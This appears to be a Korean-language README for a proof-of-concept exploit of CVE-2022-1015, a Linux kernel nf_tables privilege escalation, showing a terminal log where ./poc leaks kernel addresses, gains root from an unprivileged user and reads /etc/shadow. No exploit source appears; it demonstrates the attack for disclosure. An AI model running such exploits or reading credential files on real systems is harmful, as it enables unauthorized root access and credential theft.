
CVE-2022-1015에 대한 개념 증명 익스플로잇, Linux 커널 권한 상승 취약점입니다. unshare 기반 샌드박스 탈출과 임의 커널 메모리 쓰기를 통해 루트 권한을 획득하는 방법을 보여줍니다.
# id
uid=1000(d) gid=1000(d) groups=1000(d)
# ./poc
[+] unshare done
[*] table created: leak_table
[*] chain created: leak_chain
[*] rule added
[*] Listening on port 9999
[*] table created: leak_table
[*] chain created: leak_chain
[*] rule added
[*] Listening on port 9999
kernel_address: ffffffffb4a00000
kernel_stack: ffffc0bb0037fdf0
[*] Saved userland registers
[#] cs: 0x33
[#] ss: 0x2b
[#] rsp: 0x7ffcef818110
[#] rflags: 0x246
[*] table created: write_table
[*] chain created: write_chain
[*] rule added
uid=0(root) gid=0(root)
# id
uid=0(root) gid=0(root)
# cat /etc/shadow
root::::::::
daemon:*:::::::
bin:*:::::::
sys:*:::::::
sync:*:::::::
mail:*:::::::
www-data:*:::::::
operator:*:::::::
nobody:*:::::::
sshd:*:::::::